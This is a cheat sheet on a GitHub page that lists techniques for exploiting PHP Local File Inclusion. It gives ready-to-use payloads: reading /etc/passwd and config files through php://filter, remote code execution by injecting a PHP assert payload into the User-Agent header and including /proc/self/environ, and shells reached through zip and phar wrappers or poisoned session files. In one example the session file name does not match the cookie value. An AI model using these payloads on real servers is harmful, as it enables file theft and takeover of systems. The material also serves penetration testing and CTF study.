Skip to content
Permalink
master
Switch branches/tags
Go to file
 
 
Cannot retrieve contributors at this time

Tricky ways to exploit PHP Local File Inclusion

Introduction

Brought from Wikipedia, Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution.

For instance:

include $_GET['file'];

or harder one,

include $_GET['file'] . ".php";

Tricks

Direct Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=/etc/passwd
    • index.php?file=php://filter/convert.base64-encode/resource=config.php
  • Remote code exection:

    • /proc/self/environ

      GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
      Host: www.site.com
      User-Agent: <?php echo assert($_GET['cmd']);?>
      
    • Zip and Phar wrappers

      • index.php?file=zip://image.zip#shell.php
      • index.php?file=phar://image.phar/shell.php
    • Session Files

      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123php
        

Indirect Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=php://filter/convert.base64-encode/resource=config # will append ".php" at the end
  • Remote code exection:

    • Zip and Phar wrappers
      • index.php?file=zip://image.zip#shell
      • index.php?file=phar://image.phar/shell
    • Session Files
      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123
        

Reference

  1. File inclusion vulnerability
  2. 通过 zip/phar 协议包含文件
  3. AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
  4. lucyoa/ctf-wiki